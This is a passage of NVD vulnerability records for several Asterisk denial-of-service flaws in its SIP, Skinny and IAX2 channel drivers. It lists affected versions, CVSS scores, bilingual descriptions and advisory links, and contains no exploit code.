              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "418FD91F-014E-4529-8D72-D3FB27788EEA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "D213EC93-0D4F-4BD9-9F13-9A9E705135EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E9D2091-B292-4D6E-A91F-58D24BD5A5E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "CFF196A0-87E1-4DD2-8CDA-B19EB6F71312",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.18:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F59B7C5-8EF3-495E-9A91-9C96E6DF41E4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.18:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D9020FF4-645B-4E98-8CB0-3F8DF7C5841B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.19:*:*:*:*:*:*:*",
              "matchCriteriaId": "4F0B515F-6C5B-4A32-BE6E-3B154B4340CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.19:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "679A2262-1C6B-4549-84A9-878D7FA502F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.20:*:*:*:*:*:*:*",
              "matchCriteriaId": "86B7F9F0-A597-42BC-AD54-FAD928B7A332",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.21:*:*:*:*:*:*:*",
              "matchCriteriaId": "76A47DCB-689A-4BD5-B3A5-7DA20052A3B6",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The handle_request_info function in channels/chan_sip.c in Asterisk Open Source 1.6.2.x before 1.6.2.21 and 1.8.x before 1.8.7.2, when automon is enabled, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a crafted sequence of SIP requests."
    },
    {
      "lang": "es",
      "value": "La funci\u00f3n handle_request_info en el archivo channels/chan_sip.c en Open Source de Asterisk versiones 1.6.2.x anteriores a 1.6.2.21 y versiones 1.8.x anteriores a 1.8.7.2, cuando automon est\u00e1 habilitado, permite a los atacantes remotos causar una denegaci\u00f3n de servicio (desreferencia del puntero NULL y bloqueo del demonio) por medio de una secuencia dise\u00f1ada de peticiones SIP."
    }
  ],
  "id": "CVE-2011-4598",
  "lastModified": "2024-11-21T01:32:37.863",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 4.3,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2011-12-15T03:57:34.357",
  "references": [
    {
      "source": "secalert@redhat.com",
      "url": "http://downloads.asterisk.org/pub/security/AST-2011-014.html"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://openwall.com/lists/oss-security/2011/12/09/3"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://openwall.com/lists/oss-security/2011/12/09/4"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://osvdb.org/77598"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://secunia.com/advisories/47273"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://www.debian.org/security/2011/dsa-2367"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://downloads.asterisk.org/pub/security/AST-2011-014.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://openwall.com/lists/oss-security/2011/12/09/3"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://openwall.com/lists/oss-security/2011/12/09/4"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://osvdb.org/77598"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/47273"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.debian.org/security/2011/dsa-2367"
    }
  ],
  "sourceIdentifier": "secalert@redhat.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-200"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2012-06-19 20:55

Modified

2024-11-21 01:41

Severity ?

Summary

chan_skinny.c in the Skinny (aka SCCP) channel driver in Asterisk Open Source 10.x before 10.5.1 allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) by sending a Station Key Pad Button message and closing a connection in off-hook mode, a related issue to CVE-2012-2948.

References

▼	URL	Tags
	cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2012-009.html	Vendor Advisory
	af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2012-009.html	Vendor Advisory

Impacted products

Vendor	Product	Version
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.1
digium	asterisk	10.1.0
digium	asterisk	10.1.0
digium	asterisk	10.1.0
digium	asterisk	10.1.1
digium	asterisk	10.1.2
digium	asterisk	10.1.3
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.1
digium	asterisk	10.3.0
digium	asterisk	10.3.0
digium	asterisk	10.3.0
digium	asterisk	10.3.1
digium	asterisk	10.4.0
digium	asterisk	10.4.0
digium	asterisk	10.4.0
digium	asterisk	10.4.0
digium	asterisk	10.4.1
digium	asterisk	10.4.2
digium	asterisk	10.5.0
digium	asterisk	10.5.0
digium	asterisk	10.5.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "687ED3CE-67C4-410D-8AF4-C769015598F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "30E918CD-89C4-42DA-9709-E50E0A3FA736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "DA57FA15-D0D7-4A97-9C25-6F6566940098",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "A1C45300-A2CF-40E7-AB67-23DC24C31A1D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "958081DC-1D77-45CD-A940-C7A1AB42C7BA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "298A879D-4F65-4523-A752-D17C4F81B822",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "37AB07BE-54C4-4972-A05F-D1E2CF4363CC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "EBC63564-A84E-463D-8312-DDF1C6B7796F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "62A0906E-B631-4F3A-9ABC-9A43A43220BD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C6314ADA-2849-416D-966E-C01C322EF904",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "8B6CB1DD-614A-4B3D-99AE-9B1341427024",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CC95B04F-3746-4F1C-8428-A1FA10253E14",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "20819080-E0AB-4879-B4CF-A154D6F7EF6F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C6C45753-E2CC-4F7C-B8DA-3D8CF255EA22",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5A080197-D6AA-4FDC-888E-51D1C8251E34",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "1F08D930-D4C1-4C63-875C-171C46AE97C1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "1AA43D7D-AEAD-47CB-BFA5-B73004A1A7A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "B5ED5F6F-166D-4610-8939-A33AD45F1ADE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1D40002A-564E-425C-BA2A-7C4A8F8DAFD7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "521C4DB2-7127-4BA9-94FC-AB0E9E06FE2B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "8C905DC1-8AB8-4D83-BB5B-FA4DABC58229",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "ECC74B5D-97A1-46FF-AFA3-5D5E4A0BF3A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "F2D98C7C-94A8-4348-AF22-04A41FB6F8EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "85D39A99-E9A6-4860-BC61-56CA2FC3238B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "845DA0A4-1983-4E82-99C8-B7FBF47C632E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "5A63FBB7-F1CF-4603-848F-980742D2ED36",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "10B2084F-3AF4-4008-899C-6C1E43715201",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "217C13A5-9F8A-4392-858F-2FC88B03EB0E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "6B282462-900C-492E-98DE-65364E62F5E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "687784F0-9ACC-435D-81F9-1E1B0F61010C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9D7D020C-FE32-408B-BE37-58835FD3D95F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "39B7938F-7370-4F67-B0CD-1C14DE2E4E7B",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "chan_skinny.c in the Skinny (aka SCCP) channel driver in Asterisk Open Source 10.x before 10.5.1 allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) by sending a Station Key Pad Button message and closing a connection in off-hook mode, a related issue to CVE-2012-2948."
    },
    {
      "lang": "es",
      "value": "chan_skinny.c en el controlador de canal de Skinny (alias SCCP) en Asterisk Open Source v10.x antes v10.5.1 permite a usuarios remotos autenticados provocar una denegaci\u00f3n de servicio (eliminar la referencia del puntero NULL y ca\u00edda demonio) mediante el env\u00edo de un mensaje Station Key Pad Button y el cierre de una conexi\u00f3n en modo descolgado, un tema relacionado con CVE-2012-2948."
    }
  ],
  "evaluatorComment": "Per: http://cwe.mitre.org/data/definitions/476.html\r\n\r\n\u0027CWE-476: NULL Pointer Dereference\u0027",
  "id": "CVE-2012-3553",
  "lastModified": "2024-11-21T01:41:07.003",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 4.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2012-06-19T20:55:07.973",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2012-009.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2012-009.html"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2011-07-06 19:55

Modified

2024-11-21 01:28

Severity ?

Summary

chan_iax2.c in the IAX2 channel driver in Asterisk Open Source 1.4.x before 1.4.41.1, 1.6.2.x before 1.6.2.18.1, and 1.8.x before 1.8.4.3, and Asterisk Business Edition C.3 before C.3.7.3, accesses a memory address contained in an option control frame, which allows remote attackers to cause a denial of service (daemon crash) or possibly have unspecified other impact via a crafted frame.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2011-010-1.8.diff	Patch
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2011-010.html	Vendor Advisory
cve@mitre.org	http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062628.html
cve@mitre.org	http://secunia.com/advisories/44973	Vendor Advisory
cve@mitre.org	http://secunia.com/advisories/45048	Vendor Advisory
cve@mitre.org	http://secunia.com/advisories/45201
cve@mitre.org	http://secunia.com/advisories/45239
cve@mitre.org	http://securitytracker.com/id?1025708
cve@mitre.org	http://www.debian.org/security/2011/dsa-2276
cve@mitre.org	http://www.osvdb.org/73309
cve@mitre.org	http://www.securityfocus.com/bid/48431
cve@mitre.org	https://exchange.xforce.ibmcloud.com/vulnerabilities/68205
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2011-010-1.8.diff	Patch
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2011-010.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062628.html
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/44973	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/45048	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/45201
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/45239
af854a3a-2127-422b-91ae-364da2661108	http://securitytracker.com/id?1025708
af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2011/dsa-2276
af854a3a-2127-422b-91ae-364da2661108	http://www.osvdb.org/73309
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/48431
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/68205

Impacted products

Vendor	Product	Version
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.1
digium	asterisk	1.8.1
digium	asterisk	1.8.1.1
digium	asterisk	1.8.1.2
digium	asterisk	1.8.2
digium	asterisk	1.8.2.1
digium	asterisk	1.8.2.2
digium	asterisk	1.8.2.3
digium	asterisk	1.8.2.4
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3.1
digium	asterisk	1.8.3.2
digium	asterisk	1.8.3.3
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4.1
digium	asterisk	1.8.4.2
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.1
digium	asterisk	1.6.2.1
digium	asterisk	1.6.2.2
digium	asterisk	1.6.2.3
digium	asterisk	1.6.2.4
digium	asterisk	1.6.2.5
digium	asterisk	1.6.2.6
digium	asterisk	1.6.2.6
digium	asterisk	1.6.2.6
digium	asterisk	1.6.2.15
digium	asterisk	1.6.2.16
digium	asterisk	1.6.2.16
digium	asterisk	1.6.2.16.1
digium	asterisk	1.6.2.16.2
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17.1
digium	asterisk	1.6.2.17.2
digium	asterisk	1.6.2.17.3
digium	asterisk	1.6.2.18
digium	asterisk	1.6.2.18
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.1
digium	asterisk	1.4.2
digium	asterisk	1.4.3
digium	asterisk	1.4.4
digium	asterisk	1.4.5
digium	asterisk	1.4.6
digium	asterisk	1.4.7
digium	asterisk	1.4.7.1
digium	asterisk	1.4.8
digium	asterisk	1.4.9
digium	asterisk	1.4.10
digium	asterisk	1.4.10.1
digium	asterisk	1.4.11
digium	asterisk	1.4.12
digium	asterisk	1.4.12.1
digium	asterisk	1.4.13
digium	asterisk	1.4.14
digium	asterisk	1.4.15
digium	asterisk	1.4.16
digium	asterisk	1.4.16.1
digium	asterisk	1.4.16.2
digium	asterisk	1.4.17
digium	asterisk	1.4.18
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19.1
digium	asterisk	1.4.19.2
digium	asterisk	1.4.20
digium	asterisk	1.4.20
digium	asterisk	1.4.20
digium	asterisk	1.4.20
digium	asterisk	1.4.20.1
digium	asterisk	1.4.21
digium	asterisk	1.4.21
digium	asterisk	1.4.21
digium	asterisk	1.4.21.1
digium	asterisk	1.4.21.2
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22.1
digium	asterisk	1.4.22.2
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23.1
digium	asterisk	1.4.23.2
digium	asterisk	1.4.24
digium	asterisk	1.4.24
digium	asterisk	1.4.24.1
digium	asterisk	1.4.25
digium	asterisk	1.4.25
digium	asterisk	1.4.25.1
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26.1
digium	asterisk	1.4.26.2
digium	asterisk	1.4.26.3
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27.1
digium	asterisk	1.4.28
digium	asterisk	1.4.28
digium	asterisk	1.4.29
digium	asterisk	1.4.29
digium	asterisk	1.4.29.1
digium	asterisk	1.4.30
digium	asterisk	1.4.30
digium	asterisk	1.4.30
digium	asterisk	1.4.31
digium	asterisk	1.4.31
digium	asterisk	1.4.31
digium	asterisk	1.4.32
digium	asterisk	1.4.32
digium	asterisk	1.4.33
digium	asterisk	1.4.33
digium	asterisk	1.4.33
digium	asterisk	1.4.33.1
digium	asterisk	1.4.34
digium	asterisk	1.4.34
digium	asterisk	1.4.34
digium	asterisk	1.4.35
digium	asterisk	1.4.35
digium	asterisk	1.4.36
digium	asterisk	1.4.36
digium	asterisk	1.4.37
digium	asterisk	1.4.37
digium	asterisk	1.4.38
digium	asterisk	1.4.38
digium	asterisk	1.4.39
digium	asterisk	1.4.39
digium	asterisk	1.4.39.1
digium	asterisk	1.4.39.2
digium	asterisk	1.4.40
digium	asterisk	1.4.40
digium	asterisk	1.4.40
digium	asterisk	1.4.40
digium	asterisk	1.4.40.1
digium	asterisk	1.4.40.2
digium	asterisk	1.4.41
digium	asterisk	1.4.41
digium	asterisk	c.3.0
digium	asterisk	c.3.1.0
digium	asterisk	c.3.1.1
digium	asterisk	c.3.2.2
digium	asterisk	c.3.2.3
digium	asterisk	c.3.3.2
digium	asterisk	c.3.6.2
digium	asterisk	c.3.6.3
digium	asterisk	c.3.6.4

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F6344E43-E8AA-4340-B3A7-72F5D6A5D184",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "4C170C1C-909D-4439-91B5-DB1A9CD150C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "EE821BE5-B1D3-4854-A700-3A83E5F15724",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "149C57CA-0B4B-4220-87FC-432418D1C393",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "035595D5-BBEC-4D85-AD7A-A2C932D2BA70",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta5:*:*:*:*:*:*",
              "matchCriteriaId": "6DAF5655-F09F-47F8-AFA6-4B95F77A57F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F8E001D8-0A7B-4FDD-88E3-E124ED32B81C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9D5CFFBD-785F-4417-A54A-F3565FD6E736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D30EF999-92D1-4B19-8E32-1E4B35DE4EA1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "A67D156B-9C43-444F-ADEC-B21D99D1433C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "893EB152-6444-43DB-8714-9735354C873A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8447EE7-A834-41D7-9204-07BD3752870C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C04F2C9-5672-42F2-B664-A3EE4C954C29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "33465668-4C91-4619-960A-D26D77853E53",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CAD08674-0B44-44EA-940B-6812E2D5077D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEE87710-A129-43AA-BA08-8001848975FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F582C6E-5DA0-4D72-A40E-66BDBC5CF2B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E7CEBB8-01B3-4A05-AFE8-37A143C9833E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "522733A7-E89E-4BFD-AC93-D6882636E880",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2FAC47DD-B613-43E4-B9BF-6120B81D9789",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "86D20CB5-60E8-405E-B387-CF80C7DA5E07",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "71AB5A01-5961-4053-9111-CF32C6473A00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "77D8E1DC-041F-4B87-AF9A-E0EC4D6A4BD8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7CCCB892-30CE-4BEF-904E-5D957F94D0EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "F156798F-F2EF-4366-B17E-03165AB437D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "9EFBB9A6-DD1D-436E-919F-74A3E4F40396",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "054E34C8-B6A5-48C7-938E-D3C268E0E8BB",
              "vulnerable": true
            },
            {
